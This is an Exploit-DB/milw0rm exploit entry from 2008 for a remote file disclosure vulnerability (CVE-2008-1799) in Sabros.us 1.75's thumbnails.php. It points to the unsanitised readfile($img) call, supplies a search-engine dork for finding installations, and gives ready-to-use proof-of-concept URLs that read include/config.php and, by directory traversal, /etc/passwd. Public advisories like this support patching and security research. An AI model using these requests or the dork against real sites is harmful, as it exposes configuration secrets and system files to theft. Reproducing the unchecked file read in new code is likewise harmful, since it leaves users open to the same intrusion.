Sabros.us 1.75 - 'thumbnails.php' Remote File Disclosure

Author: HaCkeR_EgY
type: webapps
platform: php
port: 
date_added: 2008-04-03 
date_updated: 2016-11-24 
verified: 1 
codes: OSVDB-44415;CVE-2008-1799 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comsabrosus1-75.zip

           #######################################################
                   <<<<<< Remote File Disclosure Vulnerability >>>>>>
                               sabrosus 1.75  (thumbnails.php)
           #######################################################

## AUTHOR :  HaCkeR_EgY
## My HoMe :  www.PaL-HaCker.com
## ConTacT :  hacker_egy@hotmail.com

###############################################################################
## Download Script : http://sourceforge.net/project/downloading.php?groupname=sabrosus&filename=sabrosus1-75.zip&use_mirror=garr

## vurn C0de :
     in (thumbnails.php)
        line 82
                       readfile ($img) <===

## Dork : Powered by sabros.us

## PoC:  http://localhost/sabrosus/thumbnails.php?img=include/config.php
             http://localhost/sabrosus/thumbnails.php?img=../../../../../../../../etc/passwd

#################################################################################

## GREETZ TO :   My BrOther and My MasTer   " Abo Mohamed "

##  Thanx     :  FiReSell  , MoHamed EL Arab  ,  Mr.exe  ,  zaradusht  ,  M$s D@nG3rS ,and all " pal-hacker members "

#####################################################################################

# milw0rm.com [2008-04-04]